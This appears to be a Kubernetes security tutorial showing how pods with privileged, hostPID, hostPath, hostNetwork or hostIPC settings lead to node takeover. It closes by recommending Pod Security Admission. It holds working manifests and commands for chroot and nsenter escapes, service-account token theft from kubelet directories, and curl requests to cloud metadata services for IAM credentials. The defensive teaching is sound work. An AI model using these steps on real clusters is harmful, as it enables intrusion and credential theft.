Let's look at some common and simple ways to escalate privileges using K8s pods. Almost all of these attacks can be prevented using pod security policies.
Prerequisites
- Access to a K8s cluster
- Permissions to create a pod and exec into it
- No Pod Security Policies enforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like Gatekeeper
Back to Basics
As you might know, pods are nothing but a group of Linux processes that are executed using two features of the Linux kernel: namespaces and cgroups. While namespaces (HostName, PID, File System, Network, IPC) allow us to give the process a "view" that hides everything outside of those namespaces, cgroups limit the resources (CPU, RAM, block and network I/O) that the process can use.
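To make this concrete, here is a minimal sketch that prints the namespaces a process belongs to and the cgroup it is placed in. It assumes a Linux system with /proc mounted; the function name show_isolation is made up for illustration. Running it on the node and again inside a pod should show different namespace IDs, except for any namespace the pod shares with the host.

```shell
# Print the namespace IDs and cgroup membership of a process.
# Defaults to the current process when no PID is given.
show_isolation() {
  pid="${1:-self}"
  for ns in uts pid mnt net ipc; do
    # Each entry is a symlink such as "pid:[4026531836]"; two processes
    # share a namespace exactly when these IDs are equal.
    printf '%s -> %s\n' "$ns" "$(readlink "/proc/$pid/ns/$ns")"
  done
  # The cgroup(s) that limit this process's resources.
  cat "/proc/$pid/cgroup"
}

show_isolation
```

Comparing the output for PID 1 on the node with the output inside a pod is a quick way to see which walls a given pod spec has removed.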
Let's get started
K8s generally uses RBAC for authorization. Even when a user is not allowed to create a pod directly, there are at least seven other ways for them to create one using the built-in controllers: Job, CronJob, ReplicationController (not very common nowadays), ReplicaSet, Deployment, DaemonSet and StatefulSet, along with a countless number of custom controllers. So, if you are looking for ways to prevent your users from creating pods, look out for all of the different ways your cluster provides for creating them.
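As an illustration of the point above, a user who may create Jobs but not pods can still get a pod scheduled. The sketch below only prints a Job manifest; the name pod-via-job and the function name are hypothetical, and the container spec simply mirrors the pods used in the rest of this post.

```shell
# Emit a Job manifest whose pod template runs a long-lived shell.
# The Job controller, not the user, creates the resulting pod.
job_manifest() {
  cat <<'EOF'
apiVersion: batch/v1
kind: Job
metadata:
  name: pod-via-job
spec:
  template:
    spec:
      restartPolicy: Never
      containers:
      - name: pod-via-job
        image: ubuntu
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
EOF
}

# Usage (not run here):
#   job_manifest | kubectl apply -f -
```

Any of the fields used in the attacks below (privileged, hostPID, hostPath and so on) can be placed in the pod template in the same way.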
For our case, let's assume we have rights to create pod resources and to exec into them.
Modes
- privileged - A privileged container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use Linux capabilities like manipulating the network stack and accessing devices.
- hostPID
- hostNetwork
- hostIPC
- hostPath
Attack 1 (Everything Allowed)
You can exec into the pod, mount the host's root filesystem and chroot to it, effectively becoming root on the host running your pod. If it's a control-plane node, you can access secrets directly from etcd or use the credentials of other privileged control plane components.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF
kubectl exec -it everything-allowed -- bash
root@minikube:/# docker ps
bash: docker: command not found
root@minikube:/# chroot host
sh-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f3d3252343be ubuntu "/bin/sh -c -- 'whil…" 2 minutes ago Up 2 minutes k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0
Attack 2 (Privileged and HostPID)
privileged breaks down most of the walls that container security provides, and with hostPID the pod can see and enter the namespaces of any process running on the host.
How
Let's nsenter into the init process's namespaces (from there onwards we'll have the same access as in Attack 1 (Everything Allowed)).
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF
kubectl exec -it priv-and-hostpid -- bash
bash-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c050527a7218 ubuntu "nsenter --target 1 …" 3 minutes ago Up 3 minutes k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0# cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: false
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . .
Attack 3 (Privileged Only)
Like the first attack, privileged mode grants access to the node's devices, which includes the block devices under /dev. The host's disk can therefore be mounted inside the pod (though this won't give a full view of the filesystem as in Attack 1).
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod
spec:
  containers:
  - name: priv-pod
    image: ubuntu
    securityContext:
      privileged: true
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 7345880 638328 6707552 9% /
. . . . . . . . .
tmpfs 4081044 8 4081036 1% /tmp
/dev/vda1 136554284 37411016 91262620 30% /mnt/vda1
. . . . . . . .
kubectl exec -it priv-pod -- bash
root@priv-pod:/# mkdir /tmp/host-fs
root@priv-pod:/# mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/# cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs# ls
data hostpath-provisioner hostpath_pv lost+found var
root@priv-pod:/tmp/host-fs# ls var/lib/docker/ # also var/lib/kubelet
buildkit containerd containers image network overlay2 plugins runtimes swarm tmp trust volumes
Attack 4 (HostPath Only)
If the administrators have not limited what you can mount, you can mount the host's / into your pod, giving you read/write access to the host's filesystem.
- You can search for kubeconfig files and might find a cluster-admin config file
- You can search for tokens in /var/lib/kubelet/pods/ and look for ones that might give access to secrets in kube-system or maybe have the cluster-admin role
- You can add your SSH key to the host
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exec-pod
spec:
  containers:
  - name: hostpath
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF
kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/# cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root 140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root 100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 22 04:31 token -> ..data/token
Attack 5 (HostPID only)
With only hostPID, you can:
- View processes on the host: running ps within the pod lists all the processes running on the host (including processes in other pods)
- View the environment variables of each pod on the host (process UIDs must match): you can read the /proc/[PID]/environ file of each process running on the host
- View the file descriptors of each pod on the host: you can read /proc/[PID]/fd/[X] for each process running on the host
- Kill processes: you can also kill any process on the node (presenting a denial-of-service risk)
You might get lucky and find secrets, tokens etc. in the output of ps or in env vars.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-pod
spec:
  hostPID: true
  containers:
  - name: hostpid-pod
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/# ps aux
. . . <removed for brevity> . . .
root 5828 0.0 0.1 710940 8512 ? Sl 03:34 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root 5849 0.3 0.4 747660 38376 ? Ssl 03:34 0:31 /coredns -conf /etc/coredns/Corefile
root 3348 1.5 0.9 10612728 74544 ? Ssl 03:33 2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .
root@hostpid-pod:/# cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/root
You can only read environ for processes that share the same UID as your pod. To read the environ file of a process with a different UID (987, let's say), run the pod with runAsUser set to that UID.
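The two ideas above can be sketched as follows. Entries in an environ file are separated by NUL bytes, which is why a plain cat shows them run together, so the first helper puts one variable per line. The second helper prints a hostPID pod manifest with runAsUser set. Both function names and the pod name hostpid-uid-pod are made up for this sketch.

```shell
# Print an environ file with one variable per line.
# Argument: path to the file, e.g. /proc/3348/environ
print_environ() {
  tr '\000' '\n' < "$1"
}

# Emit a hostPID pod manifest that runs as the given UID, so that
# processes owned by that UID become readable under /proc.
hostpid_manifest_for_uid() {
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-uid-pod
spec:
  hostPID: true
  containers:
  - name: hostpid-uid-pod
    image: ubuntu
    securityContext:
      runAsUser: $1
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
}

# Usage (not run here):
#   hostpid_manifest_for_uid 987 | kubectl apply -f -
#   kubectl exec -it hostpid-uid-pod -- bash
#   tr '\000' '\n' < /proc/<PID>/environ    # inside the pod
```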
Attack 6 (HostNetwork only)
With only hostNetwork set to true, you can't get privileged code execution on the host directly. But there are still some things you can look for:
- Traffic sniffing - You can sniff traffic using tools like tcpdump and might find some secrets/tokens being sent unencrypted.
- Access services bound to localhost - You can access services listening only on the loopback address.
- Bypass network policy - If you set hostNetwork: true, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-pod
spec:
  hostNetwork: true
  containers:
  - name: hostnetwork
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
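Once inside such a pod, one way to find services bound to localhost without installing any extra tools is to read /proc/net/tcp, which in a hostNetwork pod reflects the node's network namespace. The following is a minimal sketch, not a complete scanner: it only handles IPv4, and the function name loopback_listeners is made up for illustration.

```shell
# List TCP sockets that are listening on 127.0.0.1.
# Argument: path to a file in /proc/net/tcp format (defaults to /proc/net/tcp).
loopback_listeners() {
  file="${1:-/proc/net/tcp}"
  # Column 2 is the local address as hex "ADDR:PORT" (0100007F is 127.0.0.1),
  # column 4 is the socket state (0A means LISTEN).
  awk '$4 == "0A" && $2 ~ /^0100007F:/ { split($2, a, ":"); print a[2] }' "$file" |
  while read -r hexport; do
    echo "127.0.0.1:$((0x$hexport))"
  done
}

loopback_listeners
```

Each address printed can then be probed from the pod, for example with curl, since the pod and the node share the same loopback interface.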
Attack 7 (HostIPC only)
Nothing much can be done here. You'll be able to read/write to the same files/mechanisms that other processes use for IPC (e.g. /dev/shm). You should also check out the other IPC mechanisms with ipcs and see if anything is written there.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostipc-pod
spec:
  hostIPC: true
  containers:
  - name: hostipc
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt
kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/# cat /dev/shm/secretpassword.txt
secretpassword=usethissecret
root@hostipc-pod:/# ipcs -a
------ Message Queues --------
key msqid owner perms used-bytes messages
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
------ Semaphore Arrays --------
key semid owner perms nsems
Attack 8 (Nothing Allowed)
- If the nodes are part of a cloud environment, you can check for the metadata service (you might find creds for the cloud provider)
# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/
# Azure
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
- Overly permissive service account: By default, the default SA of a namespace is mounted into a pod. If that SA is overly permissive, you can use it to further escalate your permissions in the cluster.
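A rough sketch of how the mounted service account could be tried against the API server from inside a pod is shown below. It assumes the token is mounted at the usual path and that curl is available in the image; the function name sa_api_get and the SA_DIR override are made up for this example.

```shell
# Query a namespaced resource list using the pod's mounted service account.
# Argument: resource name, e.g. "secrets" or "pods".
sa_api_get() {
  sa_dir="${SA_DIR:-/var/run/secrets/kubernetes.io/serviceaccount}"
  if [ ! -r "$sa_dir/token" ]; then
    echo "no readable service account token under $sa_dir" >&2
    return 1
  fi
  ns=$(cat "$sa_dir/namespace")
  # The API server is reachable in-cluster as kubernetes.default.svc;
  # ca.crt lets curl verify its certificate.
  curl --silent --cacert "$sa_dir/ca.crt" \
    -H "Authorization: Bearer $(cat "$sa_dir/token")" \
    "https://kubernetes.default.svc/api/v1/namespaces/$ns/$1"
}

# Usage (inside a pod, not run here):
#   sa_api_get secrets
```

A Forbidden response means the SA is not allowed to list that resource; a JSON list in return means the SA is more permissive than it probably should be.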
Conclusion
I just wanted to show how easy it is to gain unauthorized access to the underlying nodes or the cluster itself in the absence of proper security checks.
All of the above attacks (except Attack 8) can be mitigated by using PodSecurityPolicies. As of K8s 1.21, PodSecurityPolicy is deprecated, and the PodSecurityAdmission controller (in beta as of K8s 1.23) should be used instead.
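With Pod Security Admission, enforcement is switched on per namespace through labels. The sketch below prints a Namespace manifest carrying those labels; the function name and the example namespace name are hypothetical. As far as the Pod Security Standards go, the baseline level already rejects privileged containers, host namespaces and hostPath volumes, and restricted is stricter still.

```shell
# Emit a Namespace manifest with Pod Security Admission labels.
# Arguments: namespace name, level (privileged, baseline or restricted).
psa_namespace_manifest() {
  name="$1"
  level="${2:-baseline}"
  cat <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: $name
  labels:
    pod-security.kubernetes.io/enforce: $level
    pod-security.kubernetes.io/warn: $level
EOF
}

# Usage (not run here):
#   psa_namespace_manifest team-a baseline | kubectl apply -f -
```

With such a namespace in place, applying the manifests from Attacks 1 to 7 there should be rejected at admission time.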